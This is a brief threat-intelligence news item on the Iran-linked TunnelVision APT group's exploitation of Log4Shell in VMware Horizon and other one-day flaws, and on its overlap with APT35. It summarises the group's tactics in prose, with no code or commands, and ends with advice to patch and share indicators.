The TunnelVision APT group is exploiting the Log4j vulnerability to deploy ransomware. The group is suspected to be linked with Iran and is targeting unpatched VMware Horizon servers.

About the attacks

Researchers from SentinelOne have tracked the activities of the APT group that is largely abusing one-day vulnerabilities in its latest campaigns.
  • The group was observed abusing the Log4Shell flaw in VMware Horizon to execute PowerShell commands, sending outputs back using a webhook.
  • These PowerShell commands further download tools such as Ngrok. Additionally, they make reverse shells and drop a PowerShell backdoor to collect credentials and lateral movements.
  • The group exploited multiple one-day flaws, such as FortiOS (CVE-2018-13379) and Exchange (ProxyShell).
  • In most attacks, the group deployed a Fast Reverse Proxy Client (FRPC) and Plink tools.

The APT35 connection

The TTPs of TunnelVision overlap with Iran-linked nation-state actor APT35, also known as Phosphorus, Nemesis Kitten, and Charming Kitten. 
  • According to researchers, the backdoor drops an executable that has an obfuscated version of a reverse shell similar to the PowerLess backdoor used by APT35 (believed to be linked with Iran) in a recent wave of attacks.
  • The researchers claim that the APT35 group has used a GitHub repository ‘VmWareHorizon’ linked with an account named ‘protections20,’ which is managed by a nation-state actor.

Ending notes

TunnelVision APT group is active and exploiting different flaws and tracked by other vendors with multiple names. Organizations are suggested to share threat intelligence and take advantage of provided IOCs. Moreover, always make sure that used software and OS are up-to-date with the latest patches.

Cyware Publisher